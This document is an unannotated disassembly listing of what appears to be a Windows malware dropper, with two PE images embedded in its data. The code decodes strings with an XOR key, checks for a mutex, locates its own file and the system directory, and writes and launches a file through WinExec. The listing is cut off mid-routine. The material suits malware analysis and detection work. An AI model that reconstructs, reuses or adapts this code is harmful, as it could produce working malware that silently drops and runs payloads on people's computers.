dd 210E00E0h, 3702010Bh, 800h, 0C00h, 1000h, 1190h, 1000h
dd 2000h, 10000000h, 1000h, 200h, 1, 0
dd 4, 0
dd 8000h, 400h, 0
dd 2, 100000h, 1000h, 100000h, 1000h, 0
dd 10h, 7000h, 48h, 5000h, 37Ch, 6 dup(0)
dd 6000h, 0DCh, 3000h, 54h, 12h dup(0)
a_text db '.text',0
align 4
db '',7,0
align 4
dd 1000h, 7BCh, 400h, 3 dup(0)
dd 60000020h, 7373622Eh, 0
dd 0FE0h, 2000h, 5 dup(0)
dd 0C0000080h, 6164722Eh, 6174h, 54h, 3000h, 54h, 0C00h
dd 3 dup(0)
dd 40000020h, 7461642Eh, 61h, 0C4h, 4000h, 0C4h, 0E00h
dd 3 dup(0)
dd 0C0000040h, 6164692Eh, 6174h, 37Ch, 5000h, 37Ch, 1000h
dd 3 dup(0)
dd 0C0000060h, 6C65722Eh, 636Fh, 0E4h, 6000h, 0E4h, 1600h
dd 3 dup(0)
dd 2000020h, 6164652Eh, 6174h, 48h, 7000h, 48h, 1800h
dd 3 dup(0)
dd 40000020h, 5Ch dup(0)
dd 8B40C031h, 0F704244Ch, 60441h, 0F740000h, 824448Bh
dd 1024548Bh, 3B80289h, 0C3000000h
; =============== S U B R O U T I N E =======================================
sub_43D5E4 proc near ; CODE XREF: .data:0043D70C�p
; .data:0043D73A�p
var_14 = dword ptr -14h
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
push esi
push edi
mov eax, [esp+0Ch+arg_0]
push eax
push 0FFFFFFFEh
push 10001000h
push large dword ptr fs:0
mov large fs:0, esp
loc_43D601: ; CODE XREF: sub_43D5E4+44�j
; sub_43D5E4+4A�j
mov eax, [esp+1Ch+arg_0]
mov ebx, [eax+8]
mov esi, [eax+0Ch]
cmp esi, 0FFFFFFFFh
jz short loc_43D630
cmp esi, [esp+1Ch+arg_4]
jz short loc_43D630
lea esi, [esi+esi*2]
mov ecx, [ebx+esi*4]
mov ecx, [esp+1Ch+var_14]
mov ecx, [eax+0Ch]
cmp dword ptr [ebx+esi*4+4], 0
jnz short loc_43D601
call dword ptr [ebx+esi*4+8]
jmp short loc_43D601
; ---------------------------------------------------------------------------
loc_43D630: ; CODE XREF: sub_43D5E4+2A�j
; sub_43D5E4+30�j
pop large dword ptr fs:0
add esp, 0Ch
pop edi
pop esi
pop ebx
retn
sub_43D5E4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43D63E proc near ; CODE XREF: .data:0043D6FF�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ebx
push esi
push edi
push ebp
push 0
push 0
push 10001092h
push [ebp+arg_0]
call sub_43DCD8
pop ebp
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_43D63E endp
; ---------------------------------------------------------------------------
db 0FCh
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 8
push ebx
push esi
push edi
push ebp
mov ebx, [ebp+0Ch]
mov eax, [ebp+8]
test dword ptr [eax+4], 6
jnz loc_43D733
mov [ebp-8], eax
mov eax, [ebp+10h]
mov [ebp-4], eax
lea eax, [ebp-8]
mov [ebx-4], eax
mov esi, [ebx+0Ch]
mov edi, [ebx+8]
loc_43D691: ; CODE XREF: .data:0043D72A�j
cmp esi, 0FFFFFFFFh
jz loc_43D742
lea ecx, [esi+esi*2]
cmp dword ptr [edi+ecx*4+4], 0
jz short loc_43D721
push esi
push ebp
lea ebp, [ebx+10h]
mov eax, [ebp-14h]
mov eax, [eax]
mov eax, [eax]
mov ds:10004034h, eax
mov edx, [ebp-14h]
mov eax, [edx]
mov ds:10004038h, eax
mov eax, [edx+4]
mov ds:1000403Ch, eax
push esi
push edi
push ecx
mov ecx, 14h
lea edi, ds:10004040h
mov esi, ds:10004038h
rep movsd
lea edi, ds:10004040h
mov ds:10004038h, edi
pop ecx
pop edi
pop esi
call dword ptr [edi+ecx*4+4]
pop ebp
pop esi
mov ebx, [ebp+0Ch]
or eax, eax
jz short loc_43D721
js short loc_43D72F
mov edi, [ebx+8]
push ebx
call sub_43D63E
add esp, 4
lea ebp, [ebx+10h]
push esi
push ebx
call sub_43D5E4
add esp, 8
lea ecx, [esi+esi*2]
mov eax, [edi+ecx*4]
mov eax, [ebx+0Ch]
call dword ptr [edi+ecx*4+8]
loc_43D721: ; CODE XREF: .data:0043D6A2�j
; .data:0043D6F7�j
mov edi, [ebx+8]
lea ecx, [esi+esi*2]
mov esi, [edi+ecx*4]
jmp loc_43D691
; ---------------------------------------------------------------------------
loc_43D72F: ; CODE XREF: .data:0043D6F9�j
xor eax, eax
jmp short loc_43D74C
; ---------------------------------------------------------------------------
loc_43D733: ; CODE XREF: .data:0043D676�j
push ebp
lea ebp, [ebx+10h]
push 0FFFFFFFFh
push ebx
call sub_43D5E4
add esp, 0Ch
loc_43D742: ; CODE XREF: .data:0043D694�j
push 0Bh
call sub_43DD44
add esp, 4
loc_43D74C: ; CODE XREF: .data:0043D731�j
pop ebp
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ebx
push esi
push edi
cmp dword ptr [ebp+0Ch], 1
jnz short loc_43D765
call sub_43D788
loc_43D765: ; CODE XREF: .data:0043D75E�j
call sub_43DC37
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
mov eax, ds:10004000h
call eax
pop edi
pop esi
pop ebx
leave
retn 0Ch
; ---------------------------------------------------------------------------
db 0B8h, 1, 0
dd 0F2EB0000h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43D788 proc near ; CODE XREF: .data:0043D760�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 0Ch
push edi
push 0
push 0FFFFFFF6h
call sub_43DCFC
mov [ebp+var_8], eax
push 0
push 0FFFFFFF5h
call sub_43DCFC
mov [ebp+var_4], eax
push 0
push 0FFFFFFF4h
call sub_43DCFC
mov [ebp+var_C], eax
push 1000401Eh
push [ebp+var_8]
call sub_43DCF0
mov ds:10004008h, eax
push 1000401Ch
push [ebp+var_4]
call sub_43DCF0
mov ds:10004004h, eax
push 1000401Ch
push [ebp+var_C]
call sub_43DCF0
add esp, 30h
mov ds:1000400Ch, eax
mov edi, ds:10004004h
or edi, edi
jz short loc_43D801
push 0
push edi
call sub_43DD50
add esp, 8
loc_43D801: ; CODE XREF: sub_43D788+6C�j
mov edi, ds:1000400Ch
or edi, edi
jz short loc_43D81B
push 0
push edi
call sub_43DD50
add esp, 8
call sub_43D820
loc_43D81B: ; CODE XREF: sub_43D788+81�j
pop edi
leave
retn
sub_43D788 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43D820 proc near ; CODE XREF: sub_43D788+8E�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 14h
push ebx
push esi
push edi
mov [ebp+var_C], 0
call sub_43DC6C
mov ebx, eax
mov [ebp+var_10], ebx
jmp short loc_43D85D
; ---------------------------------------------------------------------------
loc_43D83C: ; CODE XREF: sub_43D820+45�j
cmp byte ptr ds:0[ebx], 3Dh
jz short loc_43D849
inc [ebp+var_C]
loc_43D849: ; CODE XREF: sub_43D820+24�j
mov edi, ebx
xor eax, eax
stc
sbb ecx, ecx
repne scasb
neg ecx
lea eax, [ecx-2]
mov edi, eax
inc edi
lea ebx, [ebx+edi]
loc_43D85D: ; CODE XREF: sub_43D820+1A�j
cmp byte ptr ds:0[ebx], 0
jnz short loc_43D83C
mov edi, [ebp+var_C]
inc edi
lea edi, ds:0[edi*4]
mov [ebp+var_14], edi
push [ebp+var_14]
call sub_43DD20
pop ecx
mov [ebp+var_8], eax
mov ds:10004010h, eax
cmp [ebp+var_8], 0
jnz short loc_43D890
xor eax, eax
jmp short loc_43D906
; ---------------------------------------------------------------------------
loc_43D890: ; CODE XREF: sub_43D820+6A�j
mov ebx, [ebp+var_10]
jmp short loc_43D8E9
; ---------------------------------------------------------------------------
loc_43D895: ; CODE XREF: sub_43D820+D1�j
mov edi, ebx
xor eax, eax
stc
sbb ecx, ecx
repne scasb
neg ecx
lea eax, [ecx-2]
mov edi, eax
inc edi
mov [ebp+var_4], edi
cmp byte ptr ds:0[ebx], 3Dh
jz short loc_43D8E3
push [ebp+var_4]
call sub_43DD20
pop ecx
mov esi, [ebp+var_8]
mov ds:0[esi], eax
or eax, eax
jnz short loc_43D8CC
jmp short loc_43D906
; ---------------------------------------------------------------------------
loc_43D8CC: ; CODE XREF: sub_43D820+A8�j
push ebx
mov edi, [ebp+var_8]
push dword ptr ds:0[edi]
call sub_43DD74
add esp, 8
add [ebp+var_8], 4
loc_43D8E3: ; CODE XREF: sub_43D820+91�j
mov edx, [ebp+var_4]
lea ebx, [ebx+edx]
loc_43D8E9: ; CODE XREF: sub_43D820+73�j
cmp byte ptr ds:0[ebx], 0
jnz short loc_43D895
mov edx, [ebp+var_8]
mov dword ptr ds:0[edx], 0
mov eax, 1
loc_43D906: ; CODE XREF: sub_43D820+6E�j
; sub_43D820+AA�j
pop edi
pop esi
pop ebx
leave
retn
sub_43D820 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43D90C proc near ; CODE XREF: sub_43D9B6+22�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
push esi
push edi
mov esi, [ebp+arg_4]
mov [ebp+var_4], 181h
push esi
push [ebp+arg_0]
mov eax, ds:10004098h
lea eax, ds:10002000h[eax]
push eax
call sub_43DD2C
add esp, 0Ch
xor edi, edi
jmp short loc_43D955
; ---------------------------------------------------------------------------
loc_43D93B: ; CODE XREF: sub_43D90C+4B�j
mov eax, ds:10004098h
add eax, edi
lea eax, ds:10002000h[eax]
movsx edx, byte ptr [eax]
xor edx, 0D9h
mov [eax], dl
inc edi
loc_43D955: ; CODE XREF: sub_43D90C+2D�j
cmp edi, esi
jl short loc_43D93B
mov [ebp+var_8], 389h
mov eax, ds:10004098h
add eax, esi
mov byte ptr ds:10002000h[eax], 0
xor edi, edi
mov edi, ds:10004098h
add dword ptr ds:10004098h, 3
mov eax, ds:10004098h
lea eax, [eax+esi+4]
mov ds:10004098h, eax
inc dword ptr ds:10004098h
cmp dword ptr ds:10004098h, 0DB6h
jle short loc_43D9A5
and dword ptr ds:10004098h, 0
loc_43D9A5: ; CODE XREF: sub_43D90C+90�j
mov [ebp+var_C], 9Ch
lea eax, [edi+10002000h]
pop edi
pop esi
leave
retn
sub_43D90C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43D9B6 proc near ; CODE XREF: .data:0043DB4F�p
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
var_5 = byte ptr -5
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 10h
push esi
push edi
lea edi, [ebp+var_5]
lea esi, ds:1000409Ch
xor ecx, ecx
inc ecx
rep movsb
call sub_43DCA8
push 5
push 100040BDh
call sub_43D90C
add esp, 8
push eax
push 0
push 1F0001h
call sub_43DCCC
mov [ebp+var_4], eax
or eax, eax
jz short loc_43DA11
mov [ebp+var_C], 4FA1h
inc [ebp+var_C]
push eax
call sub_43DC84
mov [ebp+var_E], 6C6Dh
inc [ebp+var_E]
xor eax, eax
inc eax
loc_43DA11: ; CODE XREF: sub_43D9B6+3C�j
pop edi
pop esi
leave
retn
sub_43D9B6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43DA15 proc near ; CODE XREF: .data:0043DB83�p
var_10A = byte ptr -10Ah
var_6 = word ptr -6
var_4 = word ptr -4
var_2 = word ptr -2
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 10Ch
push ebx
push esi
push edi
mov edi, [ebp+arg_0]
call sub_43DC60
call sub_43DC90
mov ecx, edi
or eax, 0FFFFFFFFh
loc_43DA33: ; CODE XREF: sub_43DA15+23�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_43DA33
mov ebx, eax
mov [ebp+var_6], bx
mov ax, [ebp+var_6]
mov [ebp+var_2], ax
jmp short loc_43DA68
; ---------------------------------------------------------------------------
loc_43DA4A: ; CODE XREF: sub_43DA15+59�j
movzx eax, [ebp+var_2]
cmp byte ptr [edi+eax], 5Ch
jnz short loc_43DA64
call sub_43DC54
inc [ebp+var_2]
call sub_43DCA8
jmp short loc_43DA70
; ---------------------------------------------------------------------------
loc_43DA64: ; CODE XREF: sub_43DA15+3D�j
dec [ebp+var_2]
loc_43DA68: ; CODE XREF: sub_43DA15+33�j
movzx eax, [ebp+var_2]
or eax, eax
jg short loc_43DA4A
loc_43DA70: ; CODE XREF: sub_43DA15+4D�j
mov ax, [ebp+var_2]
cmp ax, [ebp+var_6]
jnb short loc_43DAAE
mov [ebp+var_4], 0
jmp short loc_43DA9C
; ---------------------------------------------------------------------------
loc_43DA82: ; CODE XREF: sub_43DA15+97�j
movzx eax, [ebp+var_4]
movzx edx, [ebp+var_2]
mov ecx, eax
add ecx, edx
mov dl, [edi+ecx]
mov [ebp+eax+var_10A], dl
inc [ebp+var_4]
loc_43DA9C: ; CODE XREF: sub_43DA15+6B�j
movzx eax, [ebp+var_4]
movzx edx, [ebp+var_6]
movzx ecx, [ebp+var_2]
sub edx, ecx
cmp eax, edx
jle short loc_43DA82
loc_43DAAE: ; CODE XREF: sub_43DA15+63�j
mov esi, 6BBCh
add esi, 7D41h
lea eax, [ebp+var_10A]
push eax
call sub_43DCC0
call sub_43DCB4
pop edi
pop esi
pop ebx
leave
retn
sub_43DA15 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43DACF proc near ; CODE XREF: .data:0043DBD6�p
var_8 = byte ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push eax
push esi
push edi
call sub_43DC60
push 100040BBh
push [ebp+arg_0]
call sub_43DD68
add esp, 8
lea edi, [ebp+var_8]
lea esi, ds:1000409Dh
movsd
movsd
pop edi
pop esi
leave
retn
sub_43DACF endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 21Ch
push esi
push edi
mov ax, ds:100040A5h
mov [ebp-217h], ax
mov eax, ds:10004094h
add eax, 698h
push eax
call sub_43DD5C
mov byte ptr [ebp-100h], 84h
sub byte ptr [ebp-100h], 68h
mov eax, ds:10004090h
mov edx, eax
add edx, 5
push edx
mov edx, 0Fh
sub edx, ds:10004094h
push edx
mov edx, 4
sub edx, eax
push edx
call sub_43D9B6
add esp, 10h
or eax, eax
jz short loc_43DB63
xor eax, eax
inc eax
jmp loc_43DC0C
; ---------------------------------------------------------------------------
loc_43DB63: ; CODE XREF: .data:0043DB59�j
push 104h
lea eax, [ebp-205h]
push eax
push dword ptr [ebp+8]
call sub_43DC78
call sub_43DC60
lea eax, [ebp-205h]
push eax
call sub_43DA15
mov byte ptr [ebp-101h], 1Bh
add byte ptr [ebp-101h], 1
lea edi, [ebp-215h]
lea esi, ds:100040A7h
mov ecx, 4
rep movsd
push 0FFh
lea eax, [ebp-0FFh]
push eax
call sub_43DC9C
mov eax, ds:100040B7h
mov [ebp-21Bh], eax
call sub_43DC60
call sub_43DC54
lea eax, [ebp-0FFh]
push eax
call sub_43DACF
call sub_43DCA8
lea eax, [ebp-215h]
push eax
lea eax, [ebp-0FFh]
push eax
call sub_43DD68
add esp, 10h
push 1
lea eax, [ebp-0FFh]
push eax
call sub_43DCE4
call sub_43DC90
xor eax, eax
inc eax
loc_43DC0C: ; CODE XREF: .data:0043DB5E�j
pop edi
pop esi
leave
retn 0Ch
; ---------------------------------------------------------------------------
align 4
dd 243CD950h, 0F24048Bh, 82434BAh, 240C8166h
db 0, 2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43DC37
loc_43DC26: ; CODE XREF: sub_43DC37+D�j
fldcw word ptr [esp+4+var_4]
pop ecx
mov al, ah
and eax, 3
retn
; END OF FUNCTION CHUNK FOR sub_43DC37
; ---------------------------------------------------------------------------
dd 243CD950h
db 58h, 0EBh, 0F3h
; =============== S U B R O U T I N E =======================================
sub_43DC37 proc near ; CODE XREF: .data:loc_43D765�p
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0043DC26 SIZE 0000000A BYTES
push eax
fnstcw word ptr [esp+4+var_4]
mov eax, [esp+4+var_4]
or word ptr [esp+4+var_4], 300h
jmp short loc_43DC26
sub_43DC37 endp
; ---------------------------------------------------------------------------
align 4
dd 50E825FFh, 90901000h, 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43DC54 proc near ; CODE XREF: sub_43DA15+3F�p
; .data:0043DBCA�p
jmp dword ptr ds:100050ECh
sub_43DC54 endp
; ---------------------------------------------------------------------------
dw 9090h
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43DC60 proc near ; CODE XREF: sub_43DA15+F�p
; sub_43DACF+7�p ...
jmp dword ptr ds:100050F0h
sub_43DC60 endp
; ---------------------------------------------------------------------------
dw 9090h
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43DC6C proc near ; CODE XREF: sub_43D820+10�p
jmp dword ptr ds:100050F4h
sub_43DC6C endp
; ---------------------------------------------------------------------------
dw 9090h
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43DC78 proc near ; CODE XREF: .data:0043DB72�p
jmp dword ptr ds:100050F8h
sub_43DC78 endp
; ---------------------------------------------------------------------------
dw 9090h
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43DC84 proc near ; CODE XREF: sub_43D9B6+49�p
jmp dword ptr ds:100050FCh
sub_43DC84 endp
; ---------------------------------------------------------------------------
dw 9090h
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43DC90 proc near ; CODE XREF: sub_43DA15+14�p
; .data:0043DC04�p
jmp dword ptr ds:10005100h
sub_43DC90 endp
; ---------------------------------------------------------------------------
dw 9090h
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43DC9C proc near ; CODE XREF: .data:0043DBB5�p
jmp dword ptr ds:10005104h
sub_43DC9C endp
; ---------------------------------------------------------------------------
dw 9090h
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43DCA8 proc near ; CODE XREF: sub_43D9B6+16�p
; sub_43DA15+48�p ...
jmp dword ptr ds:10005108h
sub_43DCA8 endp
; ---------------------------------------------------------------------------
dw 9090h
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43DCB4 proc near ; CODE XREF: sub_43DA15+B0�p
jmp dword ptr ds:1000510Ch
sub_43DCB4 endp
; ---------------------------------------------------------------------------
dw 9090h
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43DCC0 proc near ; CODE XREF: sub_43DA15+AB�p
jmp dword ptr ds:10005110h
sub_43DCC0 endp
; ---------------------------------------------------------------------------
dw 9090h
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43DCCC proc near ; CODE XREF: sub_43D9B6+32�p
jmp dword ptr ds:10005114h
sub_43DCCC endp
; ---------------------------------------------------------------------------
dw 9090h
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43DCD8 proc near ; CODE XREF: sub_43D63E+13�p
jmp dword ptr ds:10005118h
sub_43DCD8 endp
; ---------------------------------------------------------------------------
dw 9090h
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43DCE4 proc near ; CODE XREF: .data:0043DBFF�p
jmp dword ptr ds:1000511Ch
sub_43DCE4 endp
; ---------------------------------------------------------------------------
dw 9090h
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43DCF0 proc near ; CODE XREF: sub_43D788+33�p
; sub_43D788+45�p ...
jmp dword ptr ds:10005128h
sub_43DCF0 endp
; ---------------------------------------------------------------------------
dw 9090h
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43DCFC proc near ; CODE XREF: sub_43D788+B�p
; sub_43D788+17�p ...
jmp dword ptr ds:1000512Ch
sub_43DCFC endp
; ---------------------------------------------------------------------------
dw 9090h
align 8
dd 513025FFh, 90901000h, 0
dd 513425FFh, 90901000h, 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43DD20 proc near ; CODE XREF: sub_43D820+58�p
; sub_43D820+96�p
jmp dword ptr ds:10005138h
sub_43DD20 endp
; ---------------------------------------------------------------------------
dw 9090h
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43DD2C proc near ; CODE XREF: sub_43D90C+23�p
jmp dword ptr ds:1000513Ch
sub_43DD2C endp
; ---------------------------------------------------------------------------
dw 9090h
align 8
dd 514025FFh, 90901000h, 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43DD44 proc near ; CODE XREF: .data:0043D744�p
jmp dword ptr ds:10005144h
sub_43DD44 endp
; ---------------------------------------------------------------------------
dw 9090h
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43DD50 proc near ; CODE XREF: sub_43D788+71�p
; sub_43D788+86�p
jmp dword ptr ds:10005148h
sub_43DD50 endp
; ---------------------------------------------------------------------------
dw 9090h
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43DD5C proc near ; CODE XREF: .data:0043DB1D�p
jmp dword ptr ds:1000514Ch
sub_43DD5C endp
; ---------------------------------------------------------------------------
dw 9090h
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43DD68 proc near ; CODE XREF: sub_43DACF+14�p
; .data:0043DBEE�p
jmp dword ptr ds:10005150h
sub_43DD68 endp
; ---------------------------------------------------------------------------
dw 9090h
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43DD74 proc near ; CODE XREF: sub_43D820+B7�p
jmp dword ptr ds:10005154h
sub_43DD74 endp
; ---------------------------------------------------------------------------
dw 9090h
dd 14h dup(0)
dd 2 dup(1), 7Ch dup(0)
dd 10001536h, 5 dup(0)
dd 7325h, 720077h, 1Ch dup(0)
dd 2, 0Ch, 0
dd 3B4E2A00h, 734D3E5Ah
db 0, 4Bh, 0
aNdecjhdm db 'Ndecjhdm',0 ; DATA XREF: sub_403D18+288�o
aJklmno db 'jklmno',0
aAy db 'Ay&',0
db '\',0
aTtii db '',0
align 4
dd 4Fh dup(0)
dd 5070h, 2 dup(0)
dd 52F8h, 50E8h, 50B0h, 2 dup(0)
dd 5340h, 5128h, 12h dup(0)
dd 515Ch, 516Ch, 5184h, 519Ch, 51B8h, 51D0h, 51E0h, 51F4h
dd 520Ch, 521Ch, 522Ch, 5240h, 5250h, 525Ch, 2 dup(0)
dd 5268h, 5274h, 5288h, 5294h, 52A0h, 52ACh, 52B8h, 52C4h
dd 52CCh, 52D8h, 52E0h, 52ECh, 2 dup(0)
dd 515Ch, 516Ch, 5184h, 519Ch, 51B8h, 51D0h, 51E0h, 51F4h
dd 520Ch, 521Ch, 522Ch, 5240h, 5250h, 525Ch, 2 dup(0)
dd 5268h, 5274h, 5288h, 5294h, 52A0h, 52ACh, 52B8h, 52C4h
dd 52CCh, 52D8h, 52E0h, 52ECh, 0
dd 78450081h, 72507469h, 7365636Fh, 73h, 654700DEh, 72754374h
dd 746E6572h, 636F7250h, 49737365h, 64h, 654700E0h, 72754374h
dd 746E6572h, 65726854h, 64496461h, 0
dd 654700EDh, 766E4574h, 6E6F7269h, 746E656Dh, 69727453h
dd 4173676Eh, 0
dd 6547010Ah, 646F4D74h, 46656C75h, 4E656C69h, 41656D61h
dd 0
dd 6C43001Bh, 4865736Fh, 6C646E61h, 65h, 65470124h, 6F725074h
dd 73736563h, 70616548h, 0
dd 6547013Fh, 73795374h, 446D6574h, 63657269h, 79726F74h
dd 41h, 65470155h, 63695474h, 756F436Bh, 746Eh, 6547015Ch
dd 72655674h, 6E6F6973h, 0
dd 6C470168h, 6C61626Fh, 41646441h, 416D6F74h, 0
dd 704F01D2h, 754D6E65h, 41786574h, 0
dd 7452020Eh, 776E556Ch, 646E69h, 69570298h, 6578456Eh
dd 63h, 665F0080h, 65706F64h, 6Eh, 6F5F014Fh, 5F6E6570h
dd 6866736Fh, 6C646E61h, 65h, 6366020Dh, 65736F6Ch, 0
dd 635F0039h, 74697865h, 0
dd 616D024Eh, 636F6C6Ch, 0
dd 656D0254h, 7970636Dh, 0
dd 7270025Bh, 66746E69h, 0
dd 61720260h, 657369h, 65730267h, 66756274h, 0
dd 7273026Fh, 646E61h, 74730271h, 74616372h, 0
dd 74730275h, 79706372h, 0
aKernel32_dll_0 db 'KERNEL32.DLL',0
align 4
dd 0Eh dup(10005000h), 44545243h, 442E4C4Ch, 4C4Ch, 0Ch dup(10005014h)
dd 22h dup(0)
dd 20h, 0
dd 20h, 1000h, 1800h, 2000h, 2C00h, 78h dup(0)
dd 1000h, 94h, 3086302Bh, 30F730EDh, 310D30FFh, 311B3113h
dd 31B03121h, 31FD31F0h, 320F3202h, 32243214h, 323F322Ah
dd 335F32BEh, 33783366h, 339D3381h, 33AF33A6h, 33BB33B5h
dd 33CA33C4h, 33DC33D0h, 33FF33EAh, 35183410h, 3543352Ch
dd 356D354Fh, 35DA357Eh, 368635F7h, 369E3692h, 36B636AAh
dd 36CE36C2h, 36E636DAh, 36FE36F2h, 3716370Ah, 372E3722h
dd 3746373Ah, 375E3752h, 3776376Ah, 378E3782h, 37A6379Ah
dd 37B2h, 4000h, 0Ch, 3000h, 5000h, 3Ch, 330C3308h, 33143310h
dd 331C3318h, 33243320h, 332C3328h, 33343330h, 333C3338h
dd 3350334Ch, 33583354h, 3360335Ch, 33683364h, 3370336Ch
dd 33783374h, 4Ah dup(0)
aB db 0Ah
db '|B',0
align 10h
aP_0 db '(p',0
align 4
dd 3 dup(1), 7030h, 7034h, 7038h, 2E6C6C64h, 6C6C64h, 1536h
dd 703Ch, 0
a_libmain@12 db '_LibMain@12',0
dd 6Eh dup(0)
db 0
byte_43EBC5 db 4Dh, 5Ah, 90h ; DATA XREF: sub_403B8E+DC�o
dd 300h, 400h, 0FFFF00h, 0B800h, 0
dd 4000h, 8 dup(0)
dd 8000h, 0BA1F0E00h, 9B4000Eh, 1B821CDh, 5421CD4Ch, 20736968h
dd 676F7270h, 206D6172h, 6E6E6163h, 6220746Fh, 75722065h
dd 6E69206Eh, 534F4420h, 646F6D20h, 0D0D2E65h, 240Ah, 0
dd 455000h, 4014C00h, 7CA9DF00h, 42h, 0
dd 0E00E000h, 2010B01h, 1A0037h, 180000h, 20000h, 121900h
dd 100000h, 300000h, 40000000h, 100000h, 20000h, 100h
dd 0
dd 400h, 0
dd 600000h, 40000h, 0
dd 200h, 10000000h, 100000h, 10000000h, 100000h, 0
dd 1000h, 2 dup(0)
dd 500000h, 97000h, 1Ch dup(0)
dd 65742E00h, 7478h, 19A400h, 100000h, 19A400h, 40000h
dd 3 dup(0)
dd 2000h, 73622E60h, 73h, 11000h, 300000h, 5 dup(0)
dd 8000h, 61642EC0h, 6174h, 0DE800h, 400000h, 0DE800h
dd 1E0000h, 3 dup(0)
dd 4000h, 64692EC0h, 617461h, 97000h, 500000h, 97000h
dd 2C0000h, 3 dup(0)
dd 6000h, 0C0h, 79h dup(0)
dd 40C03100h, 4244C8Bh, 60441F7h, 74000000h, 24448B0Fh
dd 24548B08h, 0B8028910h, 3
db 0C3h
; =============== S U B R O U T I N E =======================================
sub_43EFE5 proc near ; CODE XREF: .data:0043F11D�p
; .data:0043F14B�p
var_14 = dword ptr -14h
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
push esi
push edi
mov eax, [esp+0Ch+arg_0]
push eax
push 0FFFFFFFEh
push offset sub_401000
push large dword ptr fs:0
mov large fs:0, esp
loc_43F002: ; CODE XREF: sub_43EFE5+44�j
; sub_43EFE5+4A�j
mov eax, [esp+1Ch+arg_0]
mov ebx, [eax+8]
mov esi, [eax+0Ch]
cmp esi, 0FFFFFFFFh
jz short loc_43F031
cmp esi, [esp+1Ch+arg_4]
jz short loc_43F031
lea esi, [esi+esi*2]
mov ecx, [ebx+esi*4]
mov ecx, [esp+1Ch+var_14]
mov ecx, [eax+0Ch]
cmp dword ptr [ebx+esi*4+4], 0
jnz short loc_43F002
call dword ptr [ebx+esi*4+8]
jmp short loc_43F002
; ---------------------------------------------------------------------------
loc_43F031: ; CODE XREF: sub_43EFE5+2A�j
; sub_43EFE5+30�j
pop large dword ptr fs:0
add esp, 0Ch
pop edi
pop esi
pop ebx
retn
sub_43EFE5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43F03F proc near ; CODE XREF: .data:0043F110�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ebx
push esi
push edi
push ebp
push 0
push 0
push offset sub_401092
push [ebp+arg_0]
call sub_44077D
pop ebp
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_43F03F endp
; ---------------------------------------------------------------------------
db 0FCh
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 8
push ebx
push esi
push edi
push ebp
mov ebx, [ebp+0Ch]
mov eax, [ebp+8]
mov dword ptr ds:loc_40408A+2, eax
mov dword ptr ds:loc_40408F+1, ebx
test dword ptr [eax+4], 6
jnz loc_43F144
mov [ebp-8], eax
mov eax, [ebp+10h]
mov [ebp-4], eax
